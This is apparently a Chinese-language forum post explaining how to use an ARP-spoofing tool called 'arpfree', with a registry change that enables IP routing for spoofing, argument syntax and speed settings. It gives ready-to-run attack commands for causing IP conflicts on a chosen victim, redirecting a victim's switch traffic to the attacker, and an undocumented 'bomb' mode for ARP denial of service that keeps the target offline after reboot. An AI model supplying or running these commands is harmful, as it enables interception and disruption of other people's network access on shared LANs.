开始忘记说了，要使用ARP欺骗，必须启动ip路由功能，修改(添加)注册表选项：
　　  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友发现打开网卡失败，原因可能就是这个.

发送的时候可以选择ARP的TYPE。如果是ARP请求报文，则只要输入要问的IP地址

如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址

最后的发送速度可选参数为：（大小写敏感..我觉得挺不好的）

fast----------最快
hear---------每60MS一个包（可能是比较适合结合SNIFFER做监听）
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包

使用方法如下：

***********************************************************************
* (1)Send arp packet in "request mode"  Examples:                   
*    arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast         
*                        |                  |              |        |        |           
*            your mac address        |              |          |        |           
*                        destnation mac              |        |      speed         
*                                                      arp type  |                 
*                                                                    |                 
*                                                            your ip address         
***********************************************************************
* (2)Send arp packet in "reply mode"  Examples:                     
*    arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto   
*                        |                |              |        |          |      |   
*            your mac address      |              |        |        |        |     
*                                destnation mac      |        |        |    speed   
*                                                      arp type    |        |           
*                                                                    |        |         
*                                                        your ip address  |         
*                                                                              |         
*                                                        the ip address of destnation mac
***********************************************************************

补充：反击“LAN终结者”的办法：

反击“终结者”有几个办法：
1：发动比他更强烈的攻击：
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
                                                                      |
                                                                      |
                                                          这里是你想攻击的人的IP地址
2：交换机竞争：

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
                      |
                      |
        这里是你想攻击的人的MAC地址

1:情况将导致他IP地址冲突（比“终结者”来的猛烈多了）

2：情况将使得他无法连接网络（由于交换机把他的流量都给你了）
———————————更-----新----消-----息—————————————————————

因为有朋友反映在非交换环境下，如使用HUB的情况下，无法对目标进行打击

故于2006年4月5日更新附件“arpfree.rar”

增加参数“bomb”，使用方法如下：

假设，目标为IP：192.168.237.109 目标mac为：011a8575a436

攻击命令如下：

arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb

其实就是进行简单的ARP DOS攻击，快速刷新目标的ARP缓存，可以在消耗自身较少系统资源的情况下

造成和PDOS工具类似的效果，并且如果你不停止攻击，对方重启以后也无法正常进入系统

（当然前提是他没拔网线）。

其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面，大家慎用...